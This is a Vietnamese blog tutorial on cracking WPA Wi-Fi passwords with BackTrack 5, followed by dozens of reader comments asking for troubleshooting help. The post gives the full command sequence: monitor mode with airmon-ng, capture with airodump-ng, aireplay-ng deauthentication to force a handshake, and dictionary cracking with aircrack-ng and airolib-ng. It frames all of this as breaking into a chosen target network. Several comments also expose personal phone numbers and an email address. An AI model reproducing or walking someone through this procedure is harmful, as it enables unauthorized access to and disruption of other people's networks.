Hack wifi WPA với BACKTRACK 5


Các bước tiến hành như sau :
1, bật 1 cửa sổ lệnh và gõ :
iwconfig (cái này để xem các card trong máy).
airmon-ng ( để xem máy mình có card wifi hỗ trợ trong Backtrack ?).Nếu không có thì thôi,khỏi hack lun.
airmon-ng stop wlan0 (interface của card tương thích hiện ra trong lệnh airmon-ng trên).
ifconfig wlan0 donw (không có bước này thì không chạy được đâu nhá!).
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0 (mon0 là monitor interface của wlan0 sau khi thực hiện lệnh airmon-ng start wlan0).
2, mở 1 của sổ lệnh khác gõ :
airodump-ng --bssid BSSID -w wpafile -c CH mon0
( BSSID là MAC tương ứng với wifi mình định hack,hiên ra ở bảng  airodump-ng mon0.
wpafile là tên 1 file mình đặt để nó tạo ra file .cap cho mình.
CH là channel tương ứng với cột CH hiện ra ở bảng airodump-ng mon0 của wifi mình định hack.
)

aireplay-ng --deauth 0 -a BSSID -c STATION mon0 (gửi đi liên tục các gói tin để thu được WPA handshake ,có thể phải thực hiện vài lần lệnh này cho đến khi nó chạy liên tục).
3. Chuyển sang cửa sổ của lệnh airodump-ng mon0,chờ đến khi xuất hiện dòng WPA handshake thì dừng lại bằng cách ấn CTRL +C.rồi gõ lệnh :
aircrack-ng -w /đường dẫn đến file passwordlist/password.lst /đường dẫn đến file wpafile-01.cap/wpafile-01.cap (thường là /root/wpafile-01.cap ;wpafile chính là tên tương ứng với lên airodump ở trên ;password.lst là file có chứa từ điển pass , mình phải download trên mạng về,có thể là file .text hoặc .dic)
Bây giờ ngồi chờ báo KEY FOUND thôi. :d.
Tuy nhiên cách này rất lâu, chỉ dò được khoảng 900key/s.
Có cách khác nhanh hơn có thể dò được khoảng 30000-40000key/s .Đó là tạo database cho Backtrack.Làm như sau :
- Các bạn mở thêm 1 cửa sổ lệnh khác, gõ :
airolib-ng crackwpa --import essid /đường dẫn/essid.txt (essid.txt là file có chứa SSID(tên hiện ra) của wifi mình hack ; crackwpa là tên database mà mình sẽ tạo ra).
airolib-ng crackwpa --import passwd /đường dẫn/password.lst 
 airolib-ng crackwpa --batch ( kết hợp essid và password.lst , sẽ phải đợi hơi lâu để hoàn thành).

aircrack-ng -r crackwpa wpa*.cap (bây giờ tốc độ dò lên đến 30000k/s ). :d

Cái này phải phụ thuộc rất nhiều vào file password.lst ,nếu nó không chứa pass của wifi thì chịu chết k hack được.

Link download Back Track 5 R2
Chú ý : Để log vào giao diện của BT5 gõ : startx

52 nhận xét:

  1. Bạn ơi bạn giải thích chỗ này hộ mình đc ko
    airolib-ng crackwpa --import essid /đường dẫn/essid.txt
    File essid.txt la file gì vậy bạn, và nó ở chỗ nào

    Trả lờiXóa
    Trả lời
    1. essid.txt là file có chứa SSID(tên hiện ra) của wifi mình hack.
      Ví dụ : wifi mình định hack có tên là Speed thì nội dung file essid.txt là Speed.

      Xóa
    2. Sao minh burn ra dia DVD roi ma ko co file chay nhi la qua. Huong dan minh voi

      Xóa
  2. Bạn D. ơi;muốn xử dụng airolib-ng có phải cài thêm chương trình để chạy nó không vì đả chạy được aircrack-ng rồi nhưng airolib-ng thì cứ báo là không tìm thấy.Bạn nói rỏ hơn được không

    Trả lờiXóa
    Trả lời
    1. Bạn kiểm tra xem đường dẫn file đúng k?và gõ đúng lệnh chưa.Mình làm trên bt5 được mà.

      Xóa
  3. Bạn ơi có cách nào tạo database passwd list nhanh hơn không? tạo kiểu này lâu quá. dict.txt có 2.4mb mà mất cả 20 phút, tốc độ so sánh passwd của mình lên 40000 k/s dùng aircrack-ng 1.1.
    Nếu dict.txt mà 100mb thì gần 14h chắc lè lưỡi quá. Ai có cách nào nhanh hơn chỉ mình với nha.

    Trả lờiXóa
    Trả lời
    1. hic, cái làm database này lâu thật.m nghĩ nó đươc chuẩn bị trước rùi,mình phải cài backtrack vào HDD rùi tạo trước cái database này.còn dùng livecd thì chắc là chịu.

      Xóa
    2. Bạn Dũng ơi, mình đang ko biết làm cách nào cho nó hiện Card wifi trên máy mình được. Mình mới cài BT5 R2, mà nó ko nhận card wifi. Buồn quá, ko biết làm sao giờ cho nó nhận đây ? Gõ lệnh airmon-ng nó ko ra cái gì cả ???? Bạn vui lòng giúp mình được chứ ? Bạn nhá máy hoặc nhắn tin vào số 0982 103 960 giúp mình. Mình sẽ gọi lại ngay cho bạn. Bạn hướng dẫn giúp mình nhé ? Thanks alot !

      Xóa
    3. mình cũng gặp trường hợp như bạn này ko tìm thấy card wifi, bjo mình cũng chẵng biết làm s. mong bạn giúp mình vs.

      Xóa
  4. (Xin loi vi e dung BT5 nen k go dc tieng Viet). Anh oi cho e hoi tai sao AP co client connected nhung tren cua so airodump-ng mon0 cot Data deu la 0? Nhu vay la may e bi sao? hay can go them lenh gi ha anh? Vi vay nen k co STATION. Mong anh chi e cach khac phuc! thanks anh nhieu.

    Trả lờiXóa
    Trả lời
    1. Nếu hack WPA thì không cần nhìn Data làm gì đâu, chỉ cần thấy client kết nối là được.bạn kéo dài cái cửa sổ airodump-ng ra.hoặc bạn gõ thêm lệnh airodump-ng --bssid BSSID -w wpafile -c CH mon0 ! lệnh nầy để theo dõi riêng cái wifi mình muốn hack thui.lúc đấy có client thì nó sẽ hiện lên.

      Xóa
  5. Em làm đến bước này rồi, nhưng dòng STATION không có gì, Data là 0. Em lên mạng search thì biết là do không có client đăng nhập, nhưng thực tế mấy đứa bạn em vẫn đang dùng mạng( em test trên wifi phòng mình). Em k có STATION nên không làm được bước: aireplay-ng --deauth 0 -a BSSID -c STATION mon0 (gửi đi liên tục các gói tin để thu được WPA handshake ,có thể phải thực hiện vài lần lệnh này cho đến khi nó chạy liên tục). Như vậy thì em phải làm sao để có STATION ạ?
    Thanks anh vì đã trả lời! Mong anh chỉ rõ thêm cho em.

    Trả lờiXóa
  6. con cach nao khac de up k/s khong may anh. Em da tao duoc 1 dic toan 8 ky tu so(khoang 800MB), 1 dic toan 9 ky tu so ( khoang 8gb), 1 dic toan 10 ky tu so ( khoang 80 gb), the nhung viec tim pass bang aircrack toc to cham qua ( chi 1000k/s).vay de tim ra pass cua dic 8 ky tu can khoang 25 tieng.Em mong co cach khac nhanh hon 2 cach tren.

    Trả lờiXóa
    Trả lời
    1. hic. giờ mình cũng chưa tìm ra cách nào dò pass nhanh hơn được. Mình dò pass chỉ là hên xui, tạo ra một từ điển với các pass hay đặt như số điện thoại, ngày sinh,họ tên.Ăn may thì được, chứ pass khác thì chịu.

      Xóa
    2. Trần Văn Dũng ơi bạn có yahoo ko co mình xin vs ^^?

      Xóa
  7. mình không phải là dân IT nên ai có thể kiên nhẩn hướng dẩn mình củ thể và tỉ mĩ đc không, nếu được mình cảm ơn nhiều
    Yahoo của mình là caule.no_1@yahoo.com.vn
    Mình xin cảm ơn,

    Trả lờiXóa
  8. Àh sẳn tiện cho mình hỏi phải burm BLT 5 ra DVD àh.
    mong sớm nhận được sự hồi âm

    Trả lờiXóa
    Trả lời
    1. ko nhất thiết phải burm ra dvd dâu bạn, bạn có thể boot bằng usb, " cây nhà lá vườn"

      Xóa
  9. Cái này phải phụ thuộc rất nhiều vào file password.lst ,nếu nó không chứa pass của wifi thì chịu chết k hack được...rất tốn thời gian... file password.lst ko chứa pass thì có mà mơ

    Trả lờiXóa
  10. ban cho minh hoi minh sai VM-ware no k nhan card wireless jo minh muon chinh cho no nhan card ntn z ban?

    Trả lờiXóa
    Trả lời
    1. chỉ nhận những card gắn ngoài như usb wifi còn card trong laptop không nhận khi dùng VM-ware chỉ boot từ ngoài mới được

      Xóa
  11. mình dùng BT5 nhưng nó không nhận card mạng. mà trên trang BT thì không có các bản BT cũ hơn, Mình đã thử nhiều lần nhưng vẫn không nhận được.hic

    Trả lờiXóa
  12. cho minh link down file password.lst woi @

    Trả lờiXóa
  13. xin bạn chỉ dẫn tận tình hơn chút 01689468998 liêụ có thể giúp mình và được xem hách 1 cái đơn giản bằng máy cuả bạn được không phiền bạn mình ở hà nôị

    Trả lờiXóa
  14. có ai biết mua USB card wifi nào hỗ trợ Backtrack 5 ko chỉ e với ^^?

    Trả lờiXóa
    Trả lời
    1. a dung oi,cho e xin sdt duoc khong a

      Xóa
    2. sdt cua e la: 01648999530, mong anh giup e nhe

      Xóa
  15. cài tất cả ngon lành rùi: vào gõ lệnh đầu tiên mà k hiện ra cấy chi cả :hình như k nhận đc wifi nào. card k hỗ trợ backtrack rùi. =((

    Trả lờiXóa
  16. a Trần Văn Dũng oi! a có thể post 1 đoạn video hướng dẫn cụ thể được ko a?

    Trả lờiXóa
  17. a D ơi e xài Lap hãng Dell khi hack sao data nó k chịu chạy là sao z...trong khi đó các máy khác vẫn chạy bt

    Trả lờiXóa
  18. chao ban dung ban co the de lai so dien thoai tren nay duoc ko

    Trả lờiXóa
  19. Chào bạn Dũng bạn vui lòng cho mình xin số diện thoại của bạn dược không

    Trả lờiXóa
  20. http://www.youtube.com/watch?v=Gq_TohxP4rA&feature=related

    no day cac ban ah ^_^

    Trả lờiXóa
  21. vậy card wifi của em là eth1 liệu có làm được không bạn ???

    Trả lờiXóa
    Trả lời
    1. Nếu gõ lệnh iwconfig hiện và airmon-ng hiện thông số là OK

      Xóa
  22. Các bạn đọc kĩ bài hướng dẫn của mình nhé.Máy nào không hiện card thi không hack được đâu.hì.

    Trả lờiXóa
  23. cho minh hoi la cai vao may la no tu do lun ah hay la phai go lenh

    Trả lờiXóa
  24. Bạn Dũng ơi cho mình hỏi "mở 1 của sổ lệnh khác gõ :" cách mở cái này như thế nào bạn chỉ cho mình với, mình không biết cách mở, cảm ơn bạn nhiều nhé.

    Trả lờiXóa
  25. Quan trọng là từ điển
    Có thể upload một số từ điển hay dùng không?

    Trả lờiXóa
  26. Mình đã thu được WPA handshake nhưng không có từ điển nên đành chịu

    Trả lờiXóa
  27. Sao mới iwconfig thoi da khong co nhan card wifi rui . laptop bat wifi binh thuong

    Trả lờiXóa
  28. lam` sao go~ bo? backtrack ra khoi may' tinh' vay anh

    Trả lờiXóa
  29. em lo~ chay install va` lo~ xoa' user admin

    Trả lờiXóa
  30. em ko vao backtrack dc vi` mat pass backtrack

    Trả lờiXóa
  31. lam sao bjt card mang co ho tro hay ko zay

    Trả lờiXóa
  32. bạn ơi mình dùng BT5R3 nhung boot lên thi chi có màn hình nhập lệnh fullscreen lun, không có các taskbar gì hết. mình muốn vào giao diện chủ như trên window để mở cửa sổ khác. bạn chỉ giúp mình với được với. thanks

    Trả lờiXóa
  33. bạn cho mình hỏi í...thế mình đùn toshiba l40-a làm sao để cài được card wifi hô trợ trong bt5?mình tìm hoài không thấy

    Trả lờiXóa
  34. Anh Dũng ơi! cho em hỏi hack wifi trên VMware. cài backtrack được rồi, nhưng card mạng thì không thấy có trên máy ảo. Chỉnh card về NAT thì được, nhưng xài ké với máy thật thôi, không hack được, anh chỉ em với. cảm ơn Anh nhiều.

    Trả lờiXóa
  35. Chạy trên máy tính ảo thì BT5 ko nhận card wifi đâu bạn

    Trả lờiXóa
  36. ban oi no kh hien ra wlanO thi sao ha ban . minh sai laptop asus kh biet co card wifi kh nua . sao minh gõ dòng lệnh iwconfig no kh hien ra card mang

    Trả lờiXóa